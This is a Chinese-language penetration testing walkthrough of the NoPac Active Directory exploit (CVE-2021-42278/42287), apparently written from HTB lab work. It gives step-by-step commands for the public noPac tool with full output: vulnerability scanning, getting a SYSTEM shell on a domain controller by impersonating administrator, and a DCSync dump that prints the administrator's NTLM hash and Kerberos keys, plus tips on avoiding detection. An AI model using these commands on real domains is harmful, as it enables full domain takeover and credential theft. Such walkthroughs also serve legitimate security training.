NoPAC

1. NoPac

1.1. 介绍

此漏洞有两个CVE,分别为2021-42278 和 2021-42287

  • 42278:安全账户管理器(SAM)的一个绕过漏洞
  • 42287:ADCS中Kerberos特权属性证书(PAC)的漏洞

利用了能够将计算机账户的 SamAccountName 更改为域控名称的特性,通过将新主机的名称修改为与某个域控制器的 SamAccountName 相匹配的。完成更名后请求 Kerberos 票据,这会导致服务以该域控制器的名义(而非新主机的原名)向我们发放票据。当请求 TGS时,系统会发放与名称最匹配的票据。更多详细的信息请看这里

1.2. 利用

https://github.com/Ridter/noPac (此脚本依赖Impacket中的很多工具与DC通信,请先安装好impacket)

git clone https://github.com/Ridter/noPac.git

1.2.1. 枚举nopac漏洞

使用scanner.py检测是否存在漏洞 

┌──(root㉿kali)-[~/Desktop/htb/AWS/noPac]
└─# python scanner.py 'amzcorp.local/jameshauwnnel:654221p!' -dc-ip  10.13.37.15  -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10[*] Got TGT with PAC from 10.13.37.15. Ticket size 1688
[*] Got TGT from 10.13.37.15. Ticket size 1688

如果ms-DS-MachineAccountQuota 值设为 0,攻击可能会失败,因为我们的用户无法创建新的计算机账户

┌──(root㉿kali)-[~/Desktop/htb/AWS]
└─# nxc smb 10.13.37.15 -u 'jameshauwnnel' -p '654221p!'  -M  nopac
SMB         10.13.37.15     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:amzcorp.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.13.37.15     445    DC01             [+] amzcorp.local\jameshauwnnel:654221p!
NOPAC       10.13.37.15     445    DC01             TGT with PAC size 1688
NOPAC       10.13.37.15     445    DC01             TGT without PAC size 1688

1.2.2. 用NoPac GetShell

我们可以通过模拟内置管理员账户,并在目标域控制器上启动半交互式 shell 会话获 SYSTEM 级别权限的 shell
但是此方法噪音比较大

┌─[root@ea-attack01][/opt/noPac]
└──╼ #python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-SCQ6J8QNMEC$"
[*] MachineAccount "WIN-SCQ6J8QNMEC$" password = YNTtxbldbfsV
[*] Successfully added machine account WIN-SCQ6J8QNMEC$ with password YNTtxbldbfsV.
[*] WIN-SCQ6J8QNMEC$ object = CN=WIN-SCQ6J8QNMEC,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
[*] WIN-SCQ6J8QNMEC$ sAMAccountName == ACADEMY-EA-DC01
[*] Saving ticket in ACADEMY-EA-DC01.ccache
[*] Resting the machine account to WIN-SCQ6J8QNMEC$
[*] Restored WIN-SCQ6J8QNMEC$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*]     Requesting S4U2self
[*] Saving ticket in administrator.ccache
[*] Remove ccache of ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Rename ccache with target ...
[*] Attempting to del a computer with the name: WIN-SCQ6J8QNMEC$
[-] Delete computer WIN-SCQ6J8QNMEC$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you executeC:\Windows\system32>whoami
nt authority\system

可以发现已经通过建立了semi-interactive shell session。对于 smbexec shell,我们需要使用绝对路径,而不是通过 cd 来导航目录结构

检测本地目录,可以发现nopac.py自动为我们获取了一个管理员的tgt

┌─[root@ea-attack01]─[/opt/noPac]
└──╼ #ls
administrator_ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.ccache  noPac.py  README.md  requirements.txt  scanner.py  utils

1.2.3. 用NoPac Dcsync

我们可以使用内置的管理员账户进行DCSync攻击

┌─[root@ea-attack01][/opt/noPac]
└──╼ #python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████



[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Alreay have user administrator ticket for target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up...

也会生成一个TGT保存在本地当前文件夹

1.3. 噪音与隐蔽

如果需要考虑低噪音,尽可能避免使用如smbexec.py这样的工具。

Defender可以对此攻击进行拦截,此工具会用smbexec.py 创建一个名为 BTOBTO 的服务然后再创建一个名为 BTOBO 的服务,我们输入的命令会通过 SMB 协议,在 execute.bat 中发送到目标,当我们输入新命令时,会生成一个新的.bat脚本,并将其回显到临时文件中并在执行该脚本后从系统中删除

如果我们查看DF的隔离日志,会发现此行为被判定为恶意活动
Pasted image 20260313121635.png